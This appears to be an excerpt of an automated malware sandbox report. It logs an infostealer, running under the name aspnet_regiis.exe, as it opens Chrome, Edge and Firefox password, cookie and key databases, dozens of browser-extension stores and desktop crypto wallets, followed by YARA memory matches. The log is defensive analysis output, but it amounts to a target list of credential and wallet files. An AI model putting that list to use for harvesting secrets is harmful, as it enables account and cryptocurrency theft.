                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1921423227.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2014107650.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1967689413.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2021275005.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1966024248.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1921687992.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1964834206.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1866213868.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1867576709.0000000002C16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
